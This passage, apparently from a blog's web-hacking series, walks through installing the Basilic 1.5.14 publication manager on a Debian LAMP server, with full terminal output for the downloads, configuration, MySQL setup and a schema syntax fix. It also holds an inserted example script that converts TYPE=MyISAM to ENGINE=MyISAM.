qualified domain name, using 127.0.1.1 for ServerName/span/span span class="code-line"span class="go". 
ok /span/span span class="code-line"span class="go"Setting up php5-mysql (5.4.4-14+deb7u10) .../span/span span class="code-line"/span span class="code-line"span class="go"Creating config file /etc/php5/mods-available/mysql.ini with new version/span/span span class="code-line"/span span class="code-line"span class="go"Creating config file /etc/php5/mods-available/mysqli.ini with new version/span/span span class="code-line"/span span class="code-line"span class="go"Creating config file /etc/php5/mods-available/pdo_mysql.ini with new version/span/span span class="code-line"span class="go"Setting up apache2 (2.2.22-13+deb7u1) .../span/span span class="code-line"span class="go"Setting up libhtml-template-perl (2.91-1) .../span/span span class="code-line"span class="go"Setting up mysql-server (5.5.37-0+wheezy1) .../span/span span class="code-line"span class="go"Setting up php5 (5.4.4-14+deb7u10) .../span/span span class="code-line"span class="go"Setting up ssl-cert (1.0.32) .../span/span span class="code-line"span class="go"Processing triggers for libapache2-mod-php5 .../span/span span class="code-line"span class="go"[....] Reloading web server config: apache2apache2: Could not reliably determine the server#39;s fully qualified domain name, using 127.0.1.1 for ServerName/span/span span class="code-line"span class="go". 
ok /span/span span class="code-line"/code/pre/div /td/tr/table pNow that LAMP is installed we can download and install the application, first download the source from the link on a href="http://artis.imag.fr/Software/Basilic/" target="_blank"their website/a:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span 
class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span 
class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span 
class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~# /spanspan class="nb"cd/span /var/www//span span class="code-line"span class="gp"[email protected]:/var/www# /spanwget http://artis.imag.fr/Software/Basilic/basilic-1.5.14.tar.gz/span span class="code-line"span class="go"--2014-06-02 16:41:18-- http://artis.imag.fr/Software/Basilic/basilic-1.5.14.tar.gz/span/span span class="code-line"span class="go"Resolving artis.imag.fr (artis.imag.fr)... 194.199.18.202/span/span span class="code-line"span class="go"Connecting to artis.imag.fr (artis.imag.fr)|194.199.18.202|:80... connected./span/span span class="code-line"span class="go"HTTP request sent, awaiting response... 
200 OK/span/span span class="code-line"span class="go"Length: 455554 (445K) [application/x-gzip]/span/span span class="code-line"span class="go"Saving to: `basilic-1.5.14.tar.gz#39;/span/span span class="code-line"/span span class="code-line"span class="go"100%[==============================================================================================gt;] 455,554 1.13M/s in 0.4s /span/span span class="code-line"/span span class="code-line"span class="go"2014-06-02 16:41:18 (1.13 MB/s) - `basilic-1.5.14.tar.gz#39; saved [455554/455554]/span/span span class="code-line"/span span class="code-line"span class="gp"[email protected]:/var/www# /spantar vxzf basilic-1.5.14.tar.gz /span span class="code-line"span class="go"basilic-1.5.14//span/span span class="code-line"span class="go"basilic-1.5.14/configure/span/span span class="code-line"span class="go"basilic-1.5.14/CSS//span/span span class="code-line"span class="go"basilic-1.5.14/CSS/basilic.css/span/span span class="code-line"span class="go"basilic-1.5.14/index.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources//span/span span class="code-line"span class="go"basilic-1.5.14/Sources/CSS//span/span span class="code-line"span class="go"basilic-1.5.14/Sources/CSS/publi.css/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/CSS/backoffice.css/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/CSS/listpubli.css/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/CSS/basilic.css/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/CSS/header.css/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public//span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/getLanguage.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/index.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/footer.php/span/span span class="code-line"span 
class="go"basilic-1.5.14/Sources/Public/publiUtils.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/setLanguage.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/publi.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/updatePubliDocs.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/utils.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/header.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/search.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet//span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/index.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/updatePubliDocs.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/basilic.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/utils.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Authors//span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Authors/index.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Authors/authorAction.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Authors/author.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Authors/menuAuthor.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/cnrs.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/commonMenu.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/intro.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Publications//span/span span class="code-line"span 
class="go"basilic-1.5.14/Sources/Intranet/Publications/index.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Publications/menuPubli.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Publications/updatePublis.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Publications/publi.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Publications/publiAction.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Images//span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Images/import.jpg/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Images/export.jpg/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/usersguide.html/span/span span class="code-line"span class="go"basilic-1.5.14/INSTALL/span/span span class="code-line"span class="go"basilic-1.5.14/Public//span/span span class="code-line"span class="go"basilic-1.5.14/Import//span/span span class="code-line"span class="go"basilic-1.5.14/Import/_pyxdkbibtex.so/span/span span class="code-line"span class="go"basilic-1.5.14/Import/libxdkbibtex.so.1/span/span span class="code-line"span class="go"basilic-1.5.14/Import/bibtex2table/span/span span class="code-line"span class="go"basilic-1.5.14/Import/pyxdkbibtex.py/span/span span class="code-line"span class="go"basilic-1.5.14/Intranet//span/span span class="code-line"span class="go"basilic-1.5.14/Intranet/Authors//span/span span class="code-line"span class="go"basilic-1.5.14/Intranet/Publications//span/span span class="code-line"span class="go"basilic-1.5.14/Intranet/Images//span/span span class="code-line"span class="go"basilic-1.5.14/install.html/span/span span class="code-line"span class="go"basilic-1.5.14/Config//span/span span class="code-line"span class="go"basilic-1.5.14/Config/tables.txt/span/span span class="code-line"span 
class="go"basilic-1.5.14/Config/include.php/span/span span class="code-line"span class="go"basilic-1.5.14/Config/install.html/span/span span class="code-line"span class="go"basilic-1.5.14/Config/checkConfig.php/span/span span class="code-line"span class="go"basilic-1.5.14/Config/diff.php/span/span span class="code-line"span class="go"basilic-1.5.14/LICENCE/span/span span class="code-line"span class="go"basilic-1.5.14/CHANGELOG/span/span span class="code-line"span class="go"basilic-1.5.14/README/span/span span class="code-line"span class="go"basilic-1.5.14/Images//span/span span class="code-line"span class="go"basilic-1.5.14/Images/ppt.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/thumbImgHover.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/apache.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/en.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/thumbMovie.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/authorUP.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/thumbMovieHover.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/defaultThumb.jpg/span/span span class="code-line"span class="go"basilic-1.5.14/Images/empty.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/required.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/authorADD.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/search.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/php.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/authorDEL.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/updatePubli.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/thumbImg.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/mySQL.png/span/span span class="code-line"span 
class="go"basilic-1.5.14/Images/pdf.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/basilic.jpg/span/span span class="code-line"span class="go"basilic-1.5.14/Images/chercher.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/fr.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/basilic.ico/span/span span class="code-line"span class="go"basilic-1.5.14/Images/ps.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/editPubli.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/authorDOWN.png/span/span span class="code-line"span class="go"basilic-1.5.14/usersguide.html/span/span span class="code-line"/code/pre/div /td/tr/table pNow browsing to the install.html file we get the final installation instructions. It tells us we need to run code./configure/code in the basilic directory, but before we do this we have to edit the codeconfigure/code script to set the mysql username and password for both codeintranet/code and codepublic/code to codebasilic/code, after that we can run it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/var/www# /spanspan class="nb"cd/span basilic-1.5.14//span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /span./configure /span span class="code-line"span class="go"Filtering files...done/span/span span 
    Open checkConfig.php in your browser to check your configuration options.

    Make sure you access this file through your web server using an URL like
    http://your-server/path/to/basilic-1.5.14/checkConfig.php
    (and not as a file://...) so that php scripts get interpreted.

Browse to the checkConfig.php script:

[image: /assets/images/web-hacking/basilic-checkconfig.png]

Looks good, now for the database:

    [email protected]:/var/www/basilic-1.5.14# mysql -uroot -p
    Enter password:
    Welcome to the MySQL monitor.  Commands end with ; or \g.
    Your MySQL connection id is 43
    Server version: 5.5.37-0+wheezy1 (Debian)

    Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.

    Oracle is a registered trademark of Oracle Corporation and/or its
    affiliates. Other names may be trademarks of their respective
    owners.

    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

    mysql> CREATE DATABASE basilic;
    Query OK, 1 row affected (0.01 sec)

    mysql> GRANT SELECT,INSERT,UPDATE,DELETE ON basilic.* TO 'basilic'@'localhost' IDENTIFIED BY 'basilic';
    Query OK, 0 rows affected (0.00 sec)

    mysql> flush privileges;
    Query OK, 0 rows affected (0.00 sec)

    mysql> quit
    Bye
    [email protected]:/var/www/basilic-1.5.14# mysql -u root -p basilic < Config/tables.txt
    Enter password:
    ERROR 1064 (42000) at line 31: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM' at line 8

Clearly there is an issue with the tables.txt file: it sets the table type on creation with TYPE=MyISAM, which the server rejects as a syntax error. That is easy enough to fix; as MyISAM is the default table type, we can just remove that part from the file:
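The post's sed one-liner strips the TYPE=MyISAM clause, which leaves each table on whatever storage engine the server defaults to. MySQL 5.5, the version shown in the session above, dropped the old TYPE= table option in favour of ENGINE=, so the alternative that preserves the schema author's choice is to rewrite the clause rather than delete it. The script that follows is an added example, not code from the original post or from the Basilic project: the file names and the two-table sample schema are constructed for the demonstration, and the real Config/tables.txt is not reproduced.

```shell
#!/bin/sh
# Added example, not part of the original post or of Basilic itself.
# MySQL 5.5 rejects the legacy "TYPE=<engine>" table option (the ERROR 1064
# shown on this page) and expects "ENGINE=<engine>" instead. Rewriting the
# clause keeps each table on the engine the schema author chose; deleting it,
# as the post's one-liner does, leaves the choice to the server default.
# File names and the sample schema below are constructed for the demo.

# fix_table_type IN OUT: write IN to OUT with TYPE=<engine> rewritten to
# ENGINE=<engine>. Returns 1 if any TYPE= clause survives the rewrite.
fix_table_type() {
    in="$1"
    out="$2"
    # Only a TYPE that follows whitespace or ')' and is followed by '=' is a
    # table option; a column that happens to be called TYPE is not touched.
    sed -E 's/([[:space:])])TYPE[[:space:]]*=[[:space:]]*([A-Za-z]+)/\1ENGINE=\2/g' "$in" > "$out"
    # Refuse to hand back a file that still carries the old syntax.
    if grep -Eq '(^|[[:space:])])TYPE[[:space:]]*=' "$out"; then
        echo "fix_table_type: unconverted TYPE= clause left in $out" >&2
        return 1
    fi
    return 0
}

# count_engine FILE ENGINE: how many tables in FILE declare ENGINE=<ENGINE>.
count_engine() {
    grep -Eoi "ENGINE=$2" "$1" | wc -l | tr -d ' '
}

# make_sample_schema FILE: a constructed two-table schema in the old syntax,
# standing in for Config/tables.txt (which is not reproduced here). The
# column named TYPE and the quoted 'TYPE=legacy' default must survive intact.
make_sample_schema() {
    cat > "$1" <<'EOF'
CREATE TABLE article (
  id int(11) NOT NULL auto_increment,
  TYPE varchar(32) default NULL,
  note varchar(16) default 'TYPE=legacy',
  PRIMARY KEY (id)
) TYPE=MyISAM;

CREATE TABLE author (
  id int(11) NOT NULL auto_increment,
  name varchar(64) NOT NULL,
  PRIMARY KEY (id)
) TYPE = MyISAM;
EOF
}

main() {
    tmp="${TMPDIR:-/tmp}/tables.$$"
    make_sample_schema "$tmp.txt"
    fix_table_type "$tmp.txt" "$tmp.new"
    echo "tables on MyISAM after rewrite: $(count_engine "$tmp.new" MyISAM)"
    diff "$tmp.txt" "$tmp.new" || true   # show exactly what changed
    rm -f "$tmp.txt" "$tmp.new"
}

main
```

Run it as a script to see the diff between the old and rewritten schema. Whichever variant is used, the split in the session above is the right one to keep: the schema file is loaded as root, while the application's own basilic user holds only SELECT, INSERT, UPDATE and DELETE on basilic.*, so the web application has no grant that lets it alter the schema.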
    [email protected]:/var/www/basilic-1.5.14# cat Config/tables.txt | sed 's/ TYPE=MyISAM//g' > Config/tables.txt.new
    [email protected]:/var/www/basilic-1.5.14# mysql -u root -p basilic < Config/tables.txt.new
    Enter password:

Now that the database is set up, we'll have a look at the checkConfig.php script again:

[image: /assets/images/web-hacking/basilic-checkconfig2.png]

We still need to install ImageMagick's convert application and make the web root writable by the web server user:
    [email protected]:/var/www/basilic-1.5.14# apt-get install graphicsmagick-imagemagick-compat
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    The following extra packages will be installed:
      fontconfig-config fonts-droid ghostscript graphicsmagick gsfonts libavahi-client3 libavahi-common-data libavahi-common3 libcups2
      libcupsimage2 libffi5 libfontconfig1 libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libglib2.0-0 libglib2.0-data libgomp1
      libgraphicsmagick3 libgs9 libgs9-common libice6 libijs-0.35 libjasper1 libjbig0 libjbig2dec0 libjpeg8 liblcms1 liblcms2-2 libltdl7
      libpaper-utils libpaper1 libpng12-0 libsm6 libtiff4 libwmf0.2-7 poppler-data shared-mime-info ttf-dejavu-core x11-common
    Suggested packages:
      ghostscript-cups ghostscript-x hpijs graphicsmagick-dbg cups-common libjasper-runtime liblcms-utils liblcms2-utils poppler-utils
      fonts-japanese-mincho fonts-ipafont-mincho fonts-japanese-gothic fonts-ipafont-gothic fonts-arphic-ukai fonts-arphic-uming
      fonts-unfonts-core
    The following NEW packages will be installed:
      fontconfig-config fonts-droid ghostscript graphicsmagick graphicsmagick-imagemagick-compat gsfonts libavahi-client3
      libavahi-common-data libavahi-common3 libcups2 libcupsimage2 libffi5 libfontconfig1 libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common
      libglib2.0-0 libglib2.0-data libgomp1 libgraphicsmagick3 libgs9 libgs9-common libice6 libijs-0.35 libjasper1 libjbig0 libjbig2dec0
      libjpeg8 liblcms1 liblcms2-2 libltdl7 libpaper-utils libpaper1 libpng12-0 libsm6 libtiff4 libwmf0.2-7 poppler-data shared-mime-info
      ttf-dejavu-core x11-common
    0 upgraded, 40 newly installed, 0 to remove and 0 not upgraded.
    Need to get 24.4 MB of archives.
    After this operation, 78.4 MB of additional disk space will be used.
    Do you want to continue [Y/n]?
    Get:1 http://ftp.uk.debian.org/debian/ wheezy/main libavahi-common-data amd64 0.6.31-2 [135 kB]
    Get:2 http://ftp.uk.debian.org/debian/ wheezy/main libavahi-common3 amd64 0.6.31-2 [54.6 kB]
    Get:3 http://ftp.uk.debian.org/debian/ wheezy/main libavahi-client3 amd64 0.6.31-2 [59.5 kB]
    Get:4 http://ftp.uk.debian.org/debian/ wheezy/main libcups2 amd64 1.5.3-5+deb7u1 [255 kB]
    Get:5 http://ftp.uk.debian.org/debian/ wheezy/main libjpeg8 amd64 8d-1 [134 kB]
    Get:6 http://ftp.uk.debian.org/debian/ wheezy/main libpng12-0 amd64 1.2.49-1 [190 kB]
    Get:7 http://ftp.uk.debian.org/debian/ wheezy/main libjbig0 amd64 2.0-2+deb7u1 [32.6 kB]
    Get:8 http://ftp.uk.debian.org/debian/ wheezy/main libtiff4 amd64 3.9.6-11 [202 kB]
    Get:9 http://ftp.uk.debian.org/debian/ wheezy/main libcupsimage2 amd64 1.5.3-5+deb7u1 [138 kB]
    Get:10 http://ftp.uk.debian.org/debian/ wheezy/main libffi5 amd64 3.0.10-3 [24.8 kB]
    Get:11 http://ftp.uk.debian.org/debian/ wheezy/main ttf-dejavu-core all 2.33-3 [1,021 kB]
    Get:12 http://ftp.uk.debian.org/debian/ wheezy/main fontconfig-config all 2.9.0-7.1 [233 kB]
    Get:13 http://ftp.uk.debian.org/debian/ wheezy/main libfontconfig1 amd64 2.9.0-7.1 [300 kB]
    Get:14 http://ftp.uk.debian.org/debian/ wheezy/main libglib2.0-0 amd64 2.33.12+really2.32.4-5 [1,838 kB]
    Get:15 http://ftp.uk.debian.org/debian/ wheezy/main libjasper1 amd64 1.900.1-13 [159 kB]
    Get:16 http://ftp.uk.debian.org/debian/ wheezy/main libgdk-pixbuf2.0-common all 2.26.1-1 [497 kB]
    Get:17 http://ftp.uk.debian.org/debian/ wheezy/main libgdk-pixbuf2.0-0 amd64 2.26.1-1 [207 kB]
    Get:18 http://ftp.uk.debian.org/debian/ wheezy/main libgomp1 amd64 4.7.2-5 [27.5 kB]
    Get:19 http://ftp.uk.debian.org/debian/ wheezy/main x11-common all 1:7.7+3~deb7u1 [284 kB]
    Get:20 http://ftp.uk.debian.org/debian/ wheezy/main libice6 amd64 2:1.0.8-2 [63.1 kB]
    Get:21 http://ftp.uk.debian.org/debian/ wheezy/main liblcms1 amd64 1.19.dfsg-1.2 [113 kB]
    Get:22 http://ftp.uk.debian.org/debian/ wheezy/main liblcms2-2 amd64 2.2+git20110628-2.2+deb7u1 [144 kB]
    Get:23 http://ftp.uk.debian.org/debian/ wheezy/main libltdl7 amd64 2.4.2-1.1 [352 kB]
    Get:24 http://ftp.uk.debian.org/debian/ wheezy/main libpaper1 amd64 1.1.24+nmu2 [22.0 kB]
    Get:25 http://ftp.uk.debian.org/debian/ wheezy/main libsm6 amd64 2:1.2.1-2 [34.2 kB]
    Get:26 http://ftp.uk.debian.org/debian/ wheezy/main libwmf0.2-7 amd64 0.2.8.4-10.3 [193 kB]
    Get:27 http://ftp.uk.debian.org/debian/ wheezy/main poppler-data all 0.4.5-10 [1,479 kB]
    Get:28 http://ftp.uk.debian.org/debian/ wheezy/main fonts-droid all 20111207+git-1 [4,312 kB]
    Get:29 http://ftp.uk.debian.org/debian/ wheezy/main libijs-0.35 amd64 0.35-8 [20.4 kB]
    Get:30 http://ftp.uk.debian.org/debian/ wheezy/main libjbig2dec0 amd64 0.11+20120125-1 [51.8 kB]
    Get:31 http://ftp.uk.debian.org/debian/ wheezy/main libgs9-common all 9.05~dfsg-6.3+deb7u1 [1,980 kB]
    Get:32 http://ftp.uk.debian.org/debian/ wheezy/main libgs9 amd64 9.05~dfsg-6.3+deb7u1 [1,844 kB]
    Get:33 http://ftp.uk.debian.org/debian/ wheezy/main gsfonts all 1:8.11+urwcyr1.0.7~pre44-4.2 [3,364 kB]
    Get:34 http://ftp.uk.debian.org/debian/ wheezy/main ghostscript amd64 9.05~dfsg-6.3+deb7u1 [80.0 kB]
    Get:35 http://ftp.uk.debian.org/debian/ wheezy/main libgraphicsmagick3 amd64 1.3.16-1.1 [1,320 kB]
    Get:36 http://ftp.uk.debian.org/debian/ wheezy/main graphicsmagick amd64 1.3.16-1.1 [1,029 kB]
    Get:37 http://ftp.uk.debian.org/debian/ wheezy/main libglib2.0-data all 2.33.12+really2.32.4-5 [1,607 kB]
    Get:38 http://ftp.uk.debian.org/debian/ wheezy/main libpaper-utils amd64 1.1.24+nmu2 [18.3 kB]
    Get:39 http://ftp.uk.debian.org/debian/ wheezy/main shared-mime-info amd64 1.0-1+b1 [595 kB]
    Get:40 http://ftp.uk.debian.org/debian/ wheezy/main graphicsmagick-imagemagick-compat all 1.3.16-1.1 [15.9 kB]
    Fetched 24.4 MB in 1min 43s (236 kB/s)
    Extracting templates from packages: 100%
    Preconfiguring packages ...
    Selecting previously unselected package libavahi-common-data:amd64.
    (Reading database ... 28686 files and directories currently installed.)
    Unpacking libavahi-common-data:amd64 (from .../libavahi-common-data_0.6.31-2_amd64.deb) ...
    Selecting previously unselected package libavahi-common3:amd64.
    Unpacking libavahi-common3:amd64 (from .../libavahi-common3_0.6.31-2_amd64.deb) ...
    Selecting previously unselected package libavahi-client3:amd64.
    Unpacking libavahi-client3:amd64 (from .../libavahi-client3_0.6.31-2_amd64.deb) ...
    Selecting previously unselected package libcups2:amd64.
    Unpacking libcups2:amd64 (from .../libcups2_1.5.3-5+deb7u1_amd64.deb) ...
    Selecting previously unselected package libjpeg8:amd64.
    Unpacking libjpeg8:amd64 (from .../libjpeg8_8d-1_amd64.deb) ...
    Selecting previously unselected package libpng12-0:amd64.
    Unpacking libpng12-0:amd64 (from .../libpng12-0_1.2.49-1_amd64.deb) ...
    Selecting previously unselected package libjbig0:amd64.
    Unpacking libjbig0:amd64 (from .../libjbig0_2.0-2+deb7u1_amd64.deb) ...
    Selecting previously unselected package libtiff4:amd64.
    Unpacking libtiff4:amd64 (from .../libtiff4_3.9.6-11_amd64.deb) ...
    Selecting previously unselected package libcupsimage2:amd64.
    Unpacking libcupsimage2:amd64 (from .../libcupsimage2_1.5.3-5+deb7u1_amd64.deb) ...
    Selecting previously unselected package libffi5:amd64.
    Unpacking libffi5:amd64 (from .../libffi5_3.0.10-3_amd64.deb) ...
    Selecting previously unselected package ttf-dejavu-core.
    Unpacking ttf-dejavu-core (from .../ttf-dejavu-core_2.33-3_all.deb) ...
    Selecting previously unselected package fontconfig-config.
    Unpacking fontconfig-config (from .../fontconfig-config_2.9.0-7.1_all.deb) ...
    Selecting previously unselected package libfontconfig1:amd64.
    Unpacking libfontconfig1:amd64 (from .../libfontconfig1_2.9.0-7.1_amd64.deb) ...
    Selecting previously unselected package libglib2.0-0:amd64.
    Unpacking libglib2.0-0:amd64 (from .../libglib2.0-0_2.33.12+really2.32.4-5_amd64.deb) ...
    Selecting previously unselected package libjasper1:amd64.
    Unpacking libjasper1:amd64 (from .../libjasper1_1.900.1-13_amd64.deb) ...
    Selecting previously unselected package libgdk-pixbuf2.0-common.
    Unpacking libgdk-pixbuf2.0-common (from .../libgdk-pixbuf2.0-common_2.26.1-1_all.deb) ...
    Selecting previously unselected package libgdk-pixbuf2.0-0:amd64.
    Unpacking libgdk-pixbuf2.0-0:amd64 (from .../libgdk-pixbuf2.0-0_2.26.1-1_amd64.deb) ...
    Selecting previously unselected package libgomp1:amd64.
    Unpacking libgomp1:amd64 (from .../libgomp1_4.7.2-5_amd64.deb) ...
    Selecting previously unselected package x11-common.
    Unpacking x11-common (from .../x11-common_1%3a7.7+3~deb7u1_all.deb) ...
    Selecting previously unselected package libice6:amd64.
    Unpacking libice6:amd64 (from .../libice6_2%3a1.0.8-2_amd64.deb) ...
    Selecting previously unselected package liblcms1:amd64.
    Unpacking liblcms1:amd64 (from .../liblcms1_1.19.dfsg-1.2_amd64.deb) ...
    Selecting previously unselected package liblcms2-2:amd64.
    Unpacking liblcms2-2:amd64 (from .../liblcms2-2_2.2+git20110628-2.2+deb7u1_amd64.deb) ...
    Selecting previously unselected package libltdl7:amd64.
    Unpacking libltdl7:amd64 (from .../libltdl7_2.4.2-1.1_amd64.deb) ...
    Selecting previously unselected package libpaper1:amd64.
    Unpacking libpaper1:amd64 (from .../libpaper1_1.1.24+nmu2_amd64.deb) ...
    Selecting previously unselected package libsm6:amd64.
    Unpacking libsm6:amd64 (from .../libsm6_2%3a1.2.1-2_amd64.deb) ...
    Selecting previously unselected package libwmf0.2-7:amd64.
    Unpacking libwmf0.2-7:amd64 (from .../libwmf0.2-7_0.2.8.4-10.3_amd64.deb) ...
    Selecting previously unselected package poppler-data.
    Unpacking poppler-data (from .../poppler-data_0.4.5-10_all.deb) ...
    Selecting previously unselected package fonts-droid.
    Unpacking fonts-droid (from .../fonts-droid_20111207+git-1_all.deb) ...
    Selecting previously unselected package libijs-0.35.
    Unpacking libijs-0.35 (from .../libijs-0.35_0.35-8_amd64.deb) ...
    Selecting previously unselected package libjbig2dec0.
